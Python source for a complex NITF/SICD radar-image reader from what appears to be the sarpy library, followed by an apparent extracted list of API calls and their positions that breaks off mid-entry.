def segment_status(self) -> Tuple[bool, ...]:
"""
        Tuple[bool, ...]: Whether each image segment is viable for use.
"""
return self._segment_status
@property
def sicd_meta(self) -> Tuple[SICDType, ...]:
"""
Tuple[SICDType, ...]: The best inferred sicd structures.
"""
return self._sicd_meta
@property
def segment_bands(self) -> Tuple[Tuple[int, Optional[int]], ...]:
"""
This describes the structure for the output data segments from the NITF,
with each entry of the form `(image_segment, output_band)`, where
`output_band` will be `None` if the image segment has exactly one
complex band.
Returns
-------
Tuple[Tuple[int, Optional[int]], ...]
The band details for use.
"""
return self._segment_bands
def _check_band_details(
self,
index: int,
sicd_meta: List,
segment_status: List,
segment_bands: List):
if len(segment_status) != index:
raise ValueError('Inconsistent status checking state')
image_header = self.img_headers[index]
if image_header.ICAT.strip() not in ['SAR', 'SARIQ']:
segment_status.append(False)
return
# construct a preliminary sicd
sicd = extract_sicd(image_header, self._transpose_axes is not None)
bands = image_header.Bands
pvtype = image_header.PVTYPE
# handle odd bands
if (len(bands) % 2) == 1:
if image_header.PVTYPE != 'C':
# it's not complex, so we're done
segment_status.append(False)
return
segment_status.append(True)
sicd_meta.append(sicd)
segment_bands.append((index, len(bands)))
return
# we have an even number of bands - ensure that the bands are marked
# IQ/QI/MP/PM
order = bands[0].ISUBCAT + bands[1].ISUBCAT
if order not in ['IQ', 'QI', 'MP', 'PM']:
segment_status.append(False)
return
if len(bands) == 2:
# this should be the most common by far
segment_status.append(True)
sicd_meta.append(sicd)
segment_bands.append((index, 1))
return
for i in range(2, len(bands), 2):
if order != bands[i].ISUBCAT + bands[i+1].ISUBCAT:
logging.error(
                    'Image segment appears to be multiband with switched complex ordering')
segment_status.append(False)
return
        if order in ['IQ', 'QI']:
            if pvtype not in ['SI', 'R']:
                logging.error(
                    'Image segment appears to be complex of order `{}`, \n\t'
                    'but PVTYPE is `{}`'.format(order, pvtype))
                segment_status.append(False)
                return
        if order in ['MP', 'PM']:
            if pvtype not in ['INT', 'R']:
                logging.error(
                    'Image segment appears to be complex of order `{}`, \n\t'
                    'but PVTYPE is `{}`'.format(order, pvtype))
                segment_status.append(False)
                return
segment_status.append(True)
sicd_meta.append(sicd)
segment_bands.append((index, int(len(bands)/2)))
def _find_complex_image_segments(self):
"""
Find complex image segments.
Returns
-------
None
"""
sicd_meta = []
segment_status = []
segment_bands = []
for index in range(len(self.img_headers)):
self._check_band_details(index, sicd_meta, segment_status, segment_bands)
self._segment_status = tuple(segment_status)
use_sicd_meta = []
use_segment_bands = []
for (the_index, out_bands), sicd in zip(segment_bands, sicd_meta):
if out_bands == 1:
use_sicd_meta.append(sicd)
use_segment_bands.append((the_index, None))
else:
for j in range(out_bands):
use_sicd_meta.append(sicd.copy())
use_segment_bands.append((the_index, j))
self._sicd_meta = tuple(use_sicd_meta)
self._segment_bands = tuple(use_segment_bands)
class ComplexNITFReader(NITFReader, SICDTypeReader):
"""
    A reader for complex-valued NITF elements; this should be explicitly tried AFTER
    the SICDReader.
"""
def __init__(
self,
nitf_details: Union[str, ComplexNITFDetails],
reverse_axes: Union[None, int, Sequence[int]] = None,
transpose_axes: Optional[Tuple[int, ...]] = None):
"""
Parameters
----------
nitf_details : str|ComplexNITFDetails
reverse_axes : None|Sequence[int]
Any entries should be restricted to `{0, 1}`. The presence of
`0` means to reverse the rows (in the raw sense), and the presence
of `1` means to reverse the columns (in the raw sense).
transpose_axes : None|Tuple[int, ...]
If presented this should be only `(1, 0)`.
"""
if isinstance(nitf_details, str):
nitf_details = ComplexNITFDetails(
nitf_details, reverse_axes=reverse_axes, transpose_axes=transpose_axes)
if not isinstance(nitf_details, ComplexNITFDetails):
raise TypeError('The input argument for ComplexNITFReader must be a filename or '
'ComplexNITFDetails object.')
SICDTypeReader.__init__(self, None, nitf_details.sicd_meta)
NITFReader.__init__(
self,
nitf_details,
reader_type="SICD",
reverse_axes=nitf_details.reverse_axes,
transpose_axes=nitf_details.transpose_axes)
self._check_sizes()
@property
def nitf_details(self) -> ComplexNITFDetails:
"""
ComplexNITFDetails: The NITF details object.
"""
# noinspection PyTypeChecker
return self._nitf_details
def get_nitf_dict(self):
"""
Populate a dictionary with the pertinent NITF header information. This
is for use in more faithful preservation of NITF header information
in copying or rewriting sicd files.
Returns
-------
dict
"""
out = {}
security = {}
security_obj = self.nitf_details.nitf_header.Security
# noinspection PyProtectedMember
for field in NITFSecurityTags._ordering:
value = getattr(security_obj, field).strip()
if value != '':
security[field] = value
if len(security) > 0:
out['Security'] = security
out['OSTAID'] = self.nitf_details.nitf_header.OSTAID
out['FTITLE'] = self.nitf_details.nitf_header.FTITLE
return out
def populate_nitf_information_into_sicd(self):
"""
Populate some pertinent NITF header information into the SICD structure.
This provides more faithful copying or rewriting options.
"""
nitf_dict = self.get_nitf_dict()
for sicd_meta in self._sicd_meta:
sicd_meta.NITF = copy.deepcopy(nitf_dict)
def depopulate_nitf_information(self):
"""
Eliminates the NITF information dict from the SICD structure.
"""
for sicd_meta in self._sicd_meta:
sicd_meta.NITF = {}
def get_format_function(
self,
raw_dtype: numpy.dtype,
complex_order: Optional[str],
lut: Optional[numpy.ndarray],
band_dimension: int,
image_segment_index: Optional[int] = None,
**kwargs) -> Optional[FormatFunction]:
image_header = self.nitf_details.img_headers[image_segment_index]
bands = len(image_header.Bands)
if complex_order is not None and bands == 2:
return _extract_transform_data(image_header, band_dimension)
# TODO: strange nonstandard float16 handling?
return NITFReader.get_format_function(
self, raw_dtype, complex_order, lut, band_dimension, image_segment_index, **kwargs)
def _check_image_segment_for_compliance(
self,
index: int,
img_header: Union[ImageSegmentHeader, ImageSegmentHeader0]) -> bool:
return self.nitf_details.segment_status[index]
    def find_image_segment_collections(self) -> Tuple[Tuple[int, ...], ...]:
return tuple((entry[0], ) for entry in self.nitf_details.segment_bands)
def create_data_segment_for_collection_element(self, collection_index: int) -> DataSegment:
the_index, the_band = self.nitf_details.segment_bands[collection_index]
if the_index not in self._image_segment_data_segments:
data_segment = self.create_data_segment_for_image_segment(the_index, apply_format=True)
else:
data_segment = self._image_segment_data_segments[the_index]
if the_band is None:
return data_segment
else:
return SubsetSegment(data_segment, (slice(None, None, 1), slice(None, None, 1), slice(the_band, the_band+1, 1)), 'formatted', close_parent=True)
def final_attempt(file_name: str) -> Optional[ComplexNITFReader]:
"""
Contingency check to open for some other complex NITF type file.
Returns a reader instance, if so.
Parameters
----------
file_name : str|BinaryIO
the file_name to check
Returns
-------
ComplexNITFReader|None
"""
if is_file_like(file_name):
return None
try:
nitf_details = ComplexNITFDetails(file_name)
        logger.info('File {} is determined to be some other format complex NITF.'.format(file_name))
return ComplexNITFReader(nitf_details)
except (SarpyIOError, ValueError):
return None
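# --- Illustrative usage sketch (added; not part of the original module) ---
# 'example.ntf' is a hypothetical path; final_attempt returns None for
# file-like input or when parsing fails, and otherwise a ComplexNITFReader
# whose sicd_meta tuple holds the inferred SICD structures.
#
#     reader = final_attempt('example.ntf')
#     if reader is not None:
#         for sicd in reader.sicd_meta:
#             print(sicd.CollectionInfo.CoreName)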
|
[
"sarpy.io.general.format_function.ComplexFormatFunction._forward_magnitude_theta",
"sarpy.io.complex.sicd_elements.GeoData.SCPType",
"sarpy.io.complex.sicd_elements.RadarCollection.RadarCollectionType",
"sarpy.io.general.format_function.ComplexFormatFunction",
"logging.error",
"sarpy.io.complex.sicd_elements.ImageCreation.ImageCreationType",
"sarpy.io.general.nitf.NITFDetails.__init__",
"sarpy.io.complex.sicd_elements.Timeline.TimelineType",
"sarpy.io.general.nitf.NITFReader.__init__",
"sarpy.io.complex.sicd_elements.Grid.DirParamType",
"numpy.isfinite",
"sarpy.io.complex.sicd_elements.GeoData.GeoDataType",
"sarpy.io.complex.sicd_elements.Grid.WgtTypeType",
"sarpy.io.general.nitf.extract_image_corners",
"sarpy.io.general.utils.is_file_like",
"numpy.log10",
"sarpy.io.complex.sicd_elements.CollectionInfo.CollectionInfoType",
"sarpy.geometry.geocoords.ned_to_ecf",
"sarpy.geometry.latlon.num",
"sarpy.io.complex.sicd_elements.ImageData.ImageDataType",
"sarpy.io.complex.sicd_elements.SICD.SICDType",
"copy.deepcopy",
"sarpy.io.general.nitf.NITFReader.get_format_function",
"sarpy.io.complex.sicd_elements.SCPCOA.SCPCOAType",
"datetime.datetime.strptime",
"sarpy.io.complex.sicd_elements.RadarCollection.ChanParametersType",
"sarpy.geometry.geocoords.geodetic_to_ecf",
"sarpy.io.complex.base.SICDTypeReader.__init__",
"sarpy.io.complex.sicd_elements.PFA.PFAType",
"sarpy.io.complex.sicd_elements.ImageFormation.ImageFormationType",
"numpy.log",
"numpy.deg2rad",
"numpy.datetime64",
"numpy.any",
"sarpy.io.general.format_function.ComplexFormatFunction.__init__",
"sarpy.io.complex.sicd_elements.Grid.GridType",
"logging.getLogger",
"numpy.sqrt"
] |
[((2044, 2071), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (2061, 2071), False, 'import logging\n'), ((24348, 24410), 'sarpy.io.complex.sicd_elements.SICD.SICDType', 'SICDType', ([], {'CollectionInfo': 'collection_info', 'ImageData': 'image_data'}), '(CollectionInfo=collection_info, ImageData=image_data)\n', (24356, 24410), False, 'from sarpy.io.complex.sicd_elements.SICD import SICDType\n'), ((45138, 45161), 'sarpy.io.general.utils.is_file_like', 'is_file_like', (['file_name'], {}), '(file_name)\n', (45150, 45161), False, 'from sarpy.io.general.utils import is_file_like\n'), ((3655, 3758), 'sarpy.io.complex.sicd_elements.CollectionInfo.CollectionInfoType', 'CollectionInfoType', ([], {'CollectorName': 'collector_name', 'CoreName': 'core_name', 'Classification': 'classification'}), '(CollectorName=collector_name, CoreName=core_name,\n Classification=classification)\n', (3673, 3758), False, 'from sarpy.io.complex.sicd_elements.CollectionInfo import CollectionInfoType\n'), ((4880, 5030), 'sarpy.io.complex.sicd_elements.ImageData.ImageDataType', 'ImageDataType', ([], {'PixelType': 'pixel_type', 'NumRows': 'rows', 'NumCols': 'cols', 'FirstRow': '(0)', 'FirstCol': '(0)', 'FullImage': '(rows, cols)', 'SCPPixel': '(0.5 * rows, 0.5 * cols)'}), '(PixelType=pixel_type, NumRows=rows, NumCols=cols, FirstRow=0,\n FirstCol=0, FullImage=(rows, cols), SCPPixel=(0.5 * rows, 0.5 * cols))\n', (4893, 5030), False, 'from sarpy.io.complex.sicd_elements.ImageData import ImageDataType\n'), ((15291, 15340), 'datetime.datetime.strptime', 'datetime.strptime', (['aimida.CREATION_DATE', '"""%d%b%y"""'], {}), "(aimida.CREATION_DATE, '%d%b%y')\n", (15308, 15340), False, 'from datetime import datetime\n'), ((15598, 15664), 'datetime.datetime.strptime', 'datetime.strptime', (['(aimida.MISSION_DATE + aimida.TIME)', '"""%d%b%y%H%M"""'], {}), "(aimida.MISSION_DATE + aimida.TIME, '%d%b%y%H%M')\n", (15615, 15664), False, 'from datetime import datetime\n'), ((21388, 21412), 'sarpy.geometry.geocoords.geodetic_to_ecf', 'geodetic_to_ecf', (['arp_llh'], {}), '(arp_llh)\n', (21403, 21412), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((21431, 21455), 'sarpy.geometry.geocoords.geodetic_to_ecf', 'geodetic_to_ecf', (['scp_llh'], {}), '(scp_llh)\n', (21446, 21455), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((22630, 22654), 'sarpy.geometry.geocoords.geodetic_to_ecf', 'geodetic_to_ecf', (['arp_llh'], {}), '(arp_llh)\n', (22645, 22654), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((22673, 22697), 'sarpy.geometry.geocoords.geodetic_to_ecf', 'geodetic_to_ecf', (['scp_llh'], {}), '(scp_llh)\n', (22688, 22697), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((23371, 23404), 'sarpy.io.general.nitf.extract_image_corners', 'extract_image_corners', (['img_header'], {}), '(img_header)\n', (23392, 23404), False, 'from sarpy.io.general.nitf import extract_image_corners, NITFDetails, NITFReader\n'), ((25492, 25523), 'numpy.sqrt', 'numpy.sqrt', (['(data / scale_factor)'], {}), '(data / scale_factor)\n', (25502, 25523), False, 'import numpy\n'), ((28851, 29056), 'sarpy.io.general.format_function.ComplexFormatFunction.__init__', 'ComplexFormatFunction.__init__', (['self', 'raw_dtype', 'order'], {'raw_shape': 'raw_shape', 'formatted_shape': 'formatted_shape', 'reverse_axes': 'reverse_axes', 'transpose_axes': 'transpose_axes', 'band_dimension': 'band_dimension'}), '(self, raw_dtype, order, 
raw_shape=raw_shape,\n formatted_shape=formatted_shape, reverse_axes=reverse_axes,\n transpose_axes=transpose_axes, band_dimension=band_dimension)\n', (28881, 29056), False, 'from sarpy.io.general.format_function import FormatFunction, ComplexFormatFunction\n'), ((30008, 30104), 'sarpy.io.general.format_function.ComplexFormatFunction._forward_magnitude_theta', 'ComplexFormatFunction._forward_magnitude_theta', (['self', 'data', 'out', 'magnitude', 'theta', 'subscript'], {}), '(self, data, out, magnitude,\n theta, subscript)\n', (30054, 30104), False, 'from sarpy.io.general.format_function import FormatFunction, ComplexFormatFunction\n'), ((31419, 31497), 'sarpy.io.general.format_function.ComplexFormatFunction', 'ComplexFormatFunction', (['raw_dtype', 'complex_order'], {'band_dimension': 'band_dimension'}), '(raw_dtype, complex_order, band_dimension=band_dimension)\n', (31440, 31497), False, 'from sarpy.io.general.format_function import FormatFunction, ComplexFormatFunction\n'), ((35010, 35047), 'sarpy.io.general.nitf.NITFDetails.__init__', 'NITFDetails.__init__', (['self', 'file_name'], {}), '(self, file_name)\n', (35030, 35047), False, 'from sarpy.io.general.nitf import extract_image_corners, NITFDetails, NITFReader\n'), ((41100, 41159), 'sarpy.io.complex.base.SICDTypeReader.__init__', 'SICDTypeReader.__init__', (['self', 'None', 'nitf_details.sicd_meta'], {}), '(self, None, nitf_details.sicd_meta)\n', (41123, 41159), False, 'from sarpy.io.complex.base import SICDTypeReader\n'), ((41168, 41316), 'sarpy.io.general.nitf.NITFReader.__init__', 'NITFReader.__init__', (['self', 'nitf_details'], {'reader_type': '"""SICD"""', 'reverse_axes': 'nitf_details.reverse_axes', 'transpose_axes': 'nitf_details.transpose_axes'}), "(self, nitf_details, reader_type='SICD', reverse_axes=\n nitf_details.reverse_axes, transpose_axes=nitf_details.transpose_axes)\n", (41187, 41316), False, 'from sarpy.io.general.nitf import extract_image_corners, NITFDetails, NITFReader\n'), ((43632, 43750), 'sarpy.io.general.nitf.NITFReader.get_format_function', 'NITFReader.get_format_function', (['self', 'raw_dtype', 'complex_order', 'lut', 'band_dimension', 'image_segment_index'], {}), '(self, raw_dtype, complex_order, lut,\n band_dimension, image_segment_index, **kwargs)\n', (43662, 43750), False, 'from sarpy.io.general.nitf import extract_image_corners, NITFDetails, NITFReader\n'), ((5712, 5742), 'sarpy.io.complex.sicd_elements.GeoData.GeoDataType', 'GeoDataType', ([], {'ImageCorners': 'icps'}), '(ImageCorners=icps)\n', (5723, 5742), False, 'from sarpy.io.complex.sicd_elements.GeoData import GeoDataType, SCPType\n'), ((6005, 6031), 'sarpy.io.complex.sicd_elements.SCPCOA.SCPCOAType', 'SCPCOAType', ([], {'ARPPos': 'arp_ecf'}), '(ARPPos=arp_ecf)\n', (6015, 6031), False, 'from sarpy.io.complex.sicd_elements.SCPCOA import SCPCOAType\n'), ((7001, 7041), 'sarpy.io.complex.sicd_elements.Timeline.TimelineType', 'TimelineType', ([], {'CollectStart': 'collect_start'}), '(CollectStart=collect_start)\n', (7013, 7041), False, 'from sarpy.io.complex.sicd_elements.Timeline import TimelineType, IPPSetType\n'), ((7513, 7544), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'UVectECF': 'row_unit'}), '(UVectECF=row_unit)\n', (7525, 7544), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((7715, 7746), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'UVectECF': 'col_unit'}), '(UVectECF=col_unit)\n', (7727, 7746), False, 'from 
sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((8124, 8137), 'sarpy.io.complex.sicd_elements.GeoData.GeoDataType', 'GeoDataType', ([], {}), '()\n', (8135, 8137), False, 'from sarpy.io.complex.sicd_elements.GeoData import GeoDataType, SCPType\n'), ((8204, 8216), 'sarpy.io.complex.sicd_elements.SCPCOA.SCPCOAType', 'SCPCOAType', ([], {}), '()\n', (8214, 8216), False, 'from sarpy.io.complex.sicd_elements.SCPCOA import SCPCOAType\n'), ((8279, 8289), 'sarpy.io.complex.sicd_elements.Grid.GridType', 'GridType', ([], {}), '()\n', (8287, 8289), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((8360, 8374), 'sarpy.io.complex.sicd_elements.Timeline.TimelineType', 'TimelineType', ([], {}), '()\n', (8372, 8374), False, 'from sarpy.io.complex.sicd_elements.Timeline import TimelineType, IPPSetType\n'), ((8459, 8480), 'sarpy.io.complex.sicd_elements.RadarCollection.RadarCollectionType', 'RadarCollectionType', ([], {}), '()\n', (8478, 8480), False, 'from sarpy.io.complex.sicd_elements.RadarCollection import RadarCollectionType, TxFrequencyType, WaveformParametersType, ChanParametersType\n'), ((8563, 8583), 'sarpy.io.complex.sicd_elements.ImageFormation.ImageFormationType', 'ImageFormationType', ([], {}), '()\n', (8581, 8583), False, 'from sarpy.io.complex.sicd_elements.ImageFormation import ImageFormationType, TxFrequencyProcType\n'), ((10653, 10686), 'sarpy.io.complex.sicd_elements.Grid.WgtTypeType', 'WgtTypeType', ([], {'WindowName': '"""UNIFORM"""'}), "(WindowName='UNIFORM')\n", (10664, 10686), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((10727, 10760), 'sarpy.io.complex.sicd_elements.Grid.WgtTypeType', 'WgtTypeType', ([], {'WindowName': '"""UNIFORM"""'}), "(WindowName='UNIFORM')\n", (10738, 10760), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((12360, 12393), 'numpy.datetime64', 'numpy.datetime64', (['date_time', '"""us"""'], {}), "(date_time, 'us')\n", (12376, 12393), False, 'import numpy\n'), ((13493, 13541), 'sarpy.io.complex.sicd_elements.RadarCollection.ChanParametersType', 'ChanParametersType', ([], {'TxRcvPolarization': 'tx_rcv_pol'}), '(TxRcvPolarization=tx_rcv_pol)\n', (13511, 13541), False, 'from sarpy.io.complex.sicd_elements.RadarCollection import RadarCollectionType, TxFrequencyType, WaveformParametersType, ChanParametersType\n'), ((14109, 14160), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['fpn_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(fpn_ned, scp_ecf, absolute_coords=False)\n', (14119, 14160), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((14183, 14234), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['ipn_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(ipn_ned, scp_ecf, absolute_coords=False)\n', (14193, 14234), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((14262, 14295), 'sarpy.io.complex.sicd_elements.PFA.PFAType', 'PFAType', ([], {'FPN': 'fpn_ecf', 'IPN': 'ipn_ecf'}), '(FPN=fpn_ecf, IPN=ipn_ecf)\n', (14269, 14295), False, 'from sarpy.io.complex.sicd_elements.PFA import PFAType\n'), ((15421, 15460), 'sarpy.io.complex.sicd_elements.ImageCreation.ImageCreationType', 'ImageCreationType', ([], {'DateTime': 'create_time'}), '(DateTime=create_time)\n', (15438, 15460), False, 'from sarpy.io.complex.sicd_elements.ImageCreation import ImageCreationType\n'), ((17948, 17971), 
'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'SS': 'row_ss'}), '(SS=row_ss)\n', (17960, 17971), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((18128, 18151), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'SS': 'col_ss'}), '(SS=col_ss)\n', (18140, 18151), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((19895, 19949), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['arp_pos_ned', 'scp_ecf'], {'absolute_coords': '(True)'}), '(arp_pos_ned, scp_ecf, absolute_coords=True)\n', (19905, 19949), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((20057, 20112), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['arp_vel_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(arp_vel_ned, scp_ecf, absolute_coords=False)\n', (20067, 20112), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((20257, 20312), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['arp_acc_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(arp_acc_ned, scp_ecf, absolute_coords=False)\n', (20267, 20312), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((21882, 21938), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['row_unit_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(row_unit_ned, scp_ecf, absolute_coords=False)\n', (21892, 21938), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((21959, 22015), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['col_unit_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(col_unit_ned, scp_ecf, absolute_coords=False)\n', (21969, 22015), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((22808, 22832), 'sarpy.geometry.geocoords.geodetic_to_ecf', 'geodetic_to_ecf', (['scp_llh'], {}), '(scp_llh)\n', (22823, 22832), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((23185, 23241), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['row_unit_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(row_unit_ned, scp_ecf, absolute_coords=False)\n', (23195, 23241), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((23262, 23318), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['col_unit_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(col_unit_ned, scp_ecf, absolute_coords=False)\n', (23272, 23318), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((27224, 27250), 'numpy.log10', 'numpy.log10', (['tipping_point'], {}), '(tipping_point)\n', (27235, 27250), False, 'import numpy\n'), ((31861, 31939), 'sarpy.io.general.format_function.ComplexFormatFunction', 'ComplexFormatFunction', (['raw_dtype', 'complex_order'], {'band_dimension': 'band_dimension'}), '(raw_dtype, complex_order, band_dimension=band_dimension)\n', (31882, 31939), False, 'from sarpy.io.general.format_function import FormatFunction, ComplexFormatFunction\n'), ((42778, 42802), 'copy.deepcopy', 'copy.deepcopy', (['nitf_dict'], {}), '(nitf_dict)\n', (42791, 42802), False, 'import copy\n'), ((5268, 5305), 'sarpy.io.complex.sicd_elements.CollectionInfo.CollectionInfoType', 'CollectionInfoType', ([], {'CountryCodes': '[cc]'}), '(CountryCodes=[cc])\n', (5286, 5305), False, 'from sarpy.io.complex.sicd_elements.CollectionInfo import CollectionInfoType\n'), ((6424, 6457), 
'sarpy.io.complex.sicd_elements.ImageData.ImageDataType', 'ImageDataType', ([], {'SCPPixel': 'scp_pixel'}), '(SCPPixel=scp_pixel)\n', (6437, 6457), False, 'from sarpy.io.complex.sicd_elements.ImageData import ImageDataType\n'), ((6755, 6775), 'sarpy.io.complex.sicd_elements.GeoData.SCPType', 'SCPType', ([], {'ECF': 'scp_ecf'}), '(ECF=scp_ecf)\n', (6762, 6775), False, 'from sarpy.io.complex.sicd_elements.GeoData import GeoDataType, SCPType\n'), ((10837, 10870), 'sarpy.io.complex.sicd_elements.Grid.WgtTypeType', 'WgtTypeType', ([], {'WindowName': '"""HAMMING"""'}), "(WindowName='HAMMING')\n", (10848, 10870), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((10911, 10944), 'sarpy.io.complex.sicd_elements.Grid.WgtTypeType', 'WgtTypeType', ([], {'WindowName': '"""HAMMING"""'}), "(WindowName='HAMMING')\n", (10922, 10944), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((16799, 16842), 'sarpy.io.complex.sicd_elements.CollectionInfo.CollectionInfoType', 'CollectionInfoType', ([], {'CollectorName': 'sensor_id'}), '(CollectorName=sensor_id)\n', (16817, 16842), False, 'from sarpy.io.complex.sicd_elements.CollectionInfo import CollectionInfoType\n'), ((19029, 19048), 'numpy.any', 'numpy.any', (['(arr != 0)'], {}), '(arr != 0)\n', (19038, 19048), False, 'import numpy\n'), ((20975, 21011), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensrb.ACFT_LOC[:12]'], {}), '(mensrb.ACFT_LOC[:12])\n', (20989, 21011), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((21026, 21064), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensrb.ACFT_LOC[12:25]'], {}), '(mensrb.ACFT_LOC[12:25])\n', (21040, 21064), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((21170, 21204), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensrb.RP_LOC[:12]'], {}), '(mensrb.RP_LOC[:12])\n', (21184, 21204), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((21219, 21255), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensrb.RP_LOC[12:25]'], {}), '(mensrb.RP_LOC[12:25])\n', (21233, 21255), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((22217, 22253), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensra.ACFT_LOC[:10]'], {}), '(mensra.ACFT_LOC[:10])\n', (22231, 22253), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((22268, 22306), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensra.ACFT_LOC[10:21]'], {}), '(mensra.ACFT_LOC[10:21])\n', (22282, 22306), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((22412, 22446), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensra.CP_LOC[:10]'], {}), '(mensra.CP_LOC[:10])\n', (22426, 22446), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((22461, 22497), 'sarpy.geometry.latlon.num', 'lat_lon_parser', (['mensra.CP_LOC[10:21]'], {}), '(mensra.CP_LOC[10:21])\n', (22475, 22497), True, 'from sarpy.geometry.latlon import num as lat_lon_parser\n'), ((37975, 38060), 'logging.error', 'logging.error', (['"""Image segment appears to multiband with switch complex ordering"""'], {}), "('Image segment appears to multiband with switch complex ordering'\n )\n", (37988, 38060), False, 'import logging\n'), ((6616, 6636), 'sarpy.io.complex.sicd_elements.GeoData.SCPType', 'SCPType', ([], {'ECF': 'scp_ecf'}), '(ECF=scp_ecf)\n', (6623, 6636), False, 'from sarpy.io.complex.sicd_elements.GeoData import GeoDataType, SCPType\n'), ((7337, 7368), 
'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'UVectECF': 'row_unit'}), '(UVectECF=row_unit)\n', (7349, 7368), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((7390, 7421), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'UVectECF': 'col_unit'}), '(UVectECF=col_unit)\n', (7402, 7421), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((11021, 11054), 'sarpy.io.complex.sicd_elements.Grid.WgtTypeType', 'WgtTypeType', ([], {'WindowName': '"""HANNING"""'}), "(WindowName='HANNING')\n", (11032, 11054), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((11095, 11128), 'sarpy.io.complex.sicd_elements.Grid.WgtTypeType', 'WgtTypeType', ([], {'WindowName': '"""HANNING"""'}), "(WindowName='HANNING')\n", (11106, 11128), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((17557, 17596), 'numpy.deg2rad', 'numpy.deg2rad', (['the_sicd.SCPCOA.GrazeAng'], {}), '(the_sicd.SCPCOA.GrazeAng)\n', (17570, 17596), False, 'import numpy\n'), ((17687, 17726), 'numpy.deg2rad', 'numpy.deg2rad', (['the_sicd.SCPCOA.TwistAng'], {}), '(the_sicd.SCPCOA.TwistAng)\n', (17700, 17726), False, 'import numpy\n'), ((17804, 17827), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'SS': 'row_ss'}), '(SS=row_ss)\n', (17816, 17827), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((17833, 17856), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'SS': 'col_ss'}), '(SS=col_ss)\n', (17845, 17856), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((18739, 18765), 